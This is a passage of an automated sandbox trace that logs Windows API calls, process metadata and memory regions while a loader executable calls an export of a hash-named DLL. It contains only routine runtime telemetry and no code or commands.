lpMem=0x5898f0 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x584fa0 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5906d0 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x584fe0 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x589c20 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b590 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x583fb0 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b920 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x585020 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x585060 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x584090 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5825f0 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x583eb0 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5905e0 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b380 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5909a0 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x583f30 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x583f50 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b7d0 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b5f0 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58ba20 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b620 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58ba60 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x583f70 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58bae0 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x588d00 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5987d0 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x598250 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x588d20 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b7a0 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599220 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b350 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x599300 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x589ff0 | out: hHeap=0x580000) returned 1 [0226.139] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x584400 | out: hHeap=0x580000) returned 1 [0226.141] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x595ee0 | out: hHeap=0x580000) returned 1 [0226.141] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0226.141] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58aca0 | out: hHeap=0x580000) returned 1 [0226.141] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x595b10 | out: hHeap=0x580000) returned 1 [0226.141] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0226.142] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0226.142] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0226.142] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0226.142] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0226.145] LocalFree (hMem=0x589770) returned 0x0 [0226.145] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0226.145] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0226.146] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x591b10 | out: hHeap=0x580000) returned 1 [0226.146] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x594680 | out: hHeap=0x580000) returned 1 [0226.146] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0226.146] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0226.147] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0226.147] ExitProcess (uExitCode=0x0) [0226.148] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58c320 | out: hHeap=0x580000) returned 1 Thread: id = 179 os_tid = 0x127c Process: id = "19" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x49d71000" os_pid = "0xc9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_index" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4149 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4150 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4151 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4152 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 4153 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 4154 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 4155 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4156 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4157 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 4158 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 4159 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4161 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 4162 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4163 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4164 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4165 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 4166 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4167 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4168 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4169 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 4170 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4171 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4172 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4174 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4175 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4176 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4177 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4178 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4179 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4180 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4181 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4182 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4183 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4184 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4185 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4186 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4187 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4188 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 4189 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4190 start_va = 0x920000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 4191 start_va = 0xab0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 4192 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 4193 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 4194 start_va = 0x1a0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4195 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4196 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4199 start_va = 0x4c0000 end_va = 0x57ffff monitored = 0 entry_point = 0x4e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4200 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 4202 start_va = 0x1eb0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 4204 start_va = 0x1fb0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 4205 start_va = 0x21b0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 4208 start_va = 0x25b0000 end_va = 0x2daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 4211 start_va = 0x2db0000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 4744 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 4746 start_va = 0x3d80000 end_va = 0x40b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4752 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4753 start_va = 0x40c0000 end_va = 0x4353fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 4760 start_va = 0x40c0000 end_va = 0x4211fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 4764 start_va = 0x40c0000 end_va = 0x4282fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 5408 start_va = 0x40c0000 end_va = 0x5653fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 6198 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6200 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 6201 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 6202 start_va = 0x40c0000 end_va = 0x4288fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 6204 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 6205 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6206 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6207 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6208 start_va = 0x40c0000 end_va = 0x421efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 6245 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 6255 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6256 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 6257 start_va = 0x1c0000 end_va = 0x1cafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 6261 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6262 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6263 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6264 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6265 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 6272 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Thread: id = 180 os_tid = 0xa6c [0166.838] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0166.838] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0166.838] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0166.839] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0166.839] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0166.839] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0166.839] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0166.840] GetProcessHeap () returned 0x590000 [0166.840] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0166.840] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0166.840] GetLastError () returned 0x7e [0166.840] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0166.840] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0166.841] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c8) returned 0x59c320 [0166.841] SetLastError (dwErrCode=0x7e) [0166.841] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1200) returned 0x5a3470 [0166.843] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0166.843] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0166.843] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0166.843] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0166.843] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_index" [0166.843] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_index" [0166.843] GetACP () returned 0x4e4 [0166.843] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x228) returned 0x595380 [0166.843] IsValidCodePage (CodePage=0x4e4) returned 1 [0166.844] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0166.844] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0166.844] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0166.844] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0166.844] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 